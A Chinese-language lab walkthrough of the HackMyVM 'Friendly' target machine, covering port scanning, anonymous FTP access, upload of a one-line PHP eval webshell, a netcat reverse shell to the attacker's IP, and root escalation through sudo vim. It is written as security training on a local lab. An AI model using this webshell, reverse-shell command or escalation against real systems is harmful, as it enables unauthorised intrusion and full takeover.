friendly靶机渗透

笔记于2025/12/1

参照HakcMyVM/Friendly.md at master · pencek/HakcMyVM · GitHub进行复现

靶机介绍:

FTP服务匿名、WEBSHLL上传、vim提权

攻击机IP:192.168.161.139

靶机IP:192.168.161.140

端口扫描

得知开放FTP服务和WEB应用协议

复制代码
nmap -p- 192.168.161.140

详细信息检测

有匿名账户

复制代码
nmap -p21,80 -A 192.168.161.140

WEB渗透测试

网站首页

目录扫描

只有index.html页面

复制代码
gobuster dir -w /usr/share/wordlists/dirbuster-list-2.3-medium.txt -u http://192.168.161.140/ -x php,html,txt -e

FTP服务

复制代码
ftp 192.168.161.140 
#输入账户anonymous,匿名账户没有密码直接回车,继续输入 
ls -al 
#发现跟目录扫描出来一个框架

上传webshell

复制代码
<?php eval($_POST['x']);?>

上传

复制代码
put rce.php

攻击机开启监听

蚁剑连接webshell,终端执行命令

复制代码
nc -e /bin/bash 192.168.161.139 6666

内网渗透

拿到user.txt

信息收集

复制代码
sudo -l

内网提权

复制代码
https://gtfobins.github.io/gtfobins/vim/#sudo

执行提权命令

复制代码
sudo /usr/bin/vim -c '!/bin/bash'

拿到root.txt,这里的/root/root.txt是假的flag

复制代码
find / -type f -name 'root.txt'

渗透测试收获

FTP匿名登录体验和FTP服务基本命令、新的提权vim提权

相关推荐
中屹指纹浏览器15 小时前
基于P2P架构的指纹浏览器跨平台同步技术实现与性能优化
经验分享·笔记
三七吃山漆15 小时前
攻防世界——Web_php_wrong_nginx_config
开发语言·nginx·安全·web安全·网络安全·php·ctf
北漂燕郊杨哥15 小时前
Laravel中Tymon\JWTAuth 的用法示例
php·laravel
代码游侠15 小时前
学习笔记——网络基础
linux·c语言·网络·笔记·学习·算法
火羽白麟15 小时前
大坝安全的“血液”——数据支撑
安全·大坝·水利
崎岖Qiu16 小时前
【设计模式笔记19】:建造者模式
java·笔记·设计模式·建造者模式
llxxyy卢17 小时前
JWT安全&预编译CASE注入
数据库·sql·安全
旖旎夜光1 天前
C++(17)
c++·学习
wanhengidc1 天前
云手机的适配性怎么样?
运维·服务器·安全·智能手机·云计算
专注于大数据技术栈1 天前
java学习--StringBuilder
java·学习